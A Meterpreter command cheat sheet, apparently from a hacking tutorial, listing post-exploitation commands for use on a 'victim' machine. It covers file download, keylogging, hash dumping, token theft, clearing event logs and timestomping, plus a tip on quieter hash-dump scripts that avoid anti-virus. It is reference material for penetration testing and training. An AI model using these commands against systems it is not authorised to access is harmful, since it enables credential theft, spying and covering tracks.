Step 1: Core Commands
At its most basic, meterpreter is a Linux terminal on the victim's computer. As such, many of our basic Linux commands can be used in meterpreter, even on Windows or other operating systems.
Here are a few core commands that can be used in meterpreter.
? - Help menu
background - move the current session to the background
bgkill - kill a background meterpreter script
bglist - provide a list of all running background scripts
bgrun - run a script as a background thread
channel - display active channels
close - close a channel
exit - terminate the meterpreter session
help - Help menu
interact - interact with a channel
irb - enter Ruby scripting mode
migrate - move to the active process with the specified PID
quit - terminate the meterpreter session
read - read data from a channel
run - execute the meterpreter script named after it
use - load a meterpreter extension
write - write data to a channel
Step 2: File System Commands
cat - read a file and output it to standard output
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system
edit - edit a file with vim
getlwd - print the local directory
getwd - print working directory
lcd - change the local directory
lpwd - print the local directory
ls - list the files in the current directory
mkdir - create a directory on the victim's system
pwd - print working directory
rm - delete a file
rmdir - remove a directory on the victim's system
upload - upload a file from the attacker's system to the victim's system
Step 3: Network Commands
ipconfig - display the network interfaces with key information, including the IP address, and so on
portfwd - port forwarding
route - view or modify the victim's routing table
Step 4: System Commands
clearev - clear the event logs on the victim's computer
drop_token - drop a stolen token
execute - run a command
getpid - get the current process ID (PID)
getprivs - get as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process with the specified PID
ps - list the running processes
reboot - restart the victim's computer
reg - interact with the registry of the victim
rev2self - call RevertToSelf() on the victim machine
shell - open a shell on the victim's computer
shutdown - shut down the victim's computer
steal_token - attempt to steal the token of the specified (PID) process
sysinfo - get details about the victim computer, such as its name and operating system
Step 5: User Interface Commands
enumdesktops - list all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - check how long the victim system has been idle
keyscan_dump - dump the contents of the keylogger
keyscan_start - start the keylogger when associated with a process such as Word or a browser
keyscan_stop - stop the keylogger
screenshot - grab a screenshot of the meterpreter desktop
set_desktop - change the meterpreter desktop
uictl - enable control of some of the user interface components
Step 6: Privilege Escalation Commands
getsystem - obtain system administrator privileges
Step 7: Password Dump Commands
hashdump - grab the hash values in the password (SAM) file
Please note that hashdump will trip anti-virus software, but there are now two scripts that are more subtle, "run hashdump" and "run smart_hashdump". Find out more about those in my upcoming meterpreter script cheat sheet.
Step 8: Timestomp Commands
timestomp - manipulate the modify, access, and create attributes of a file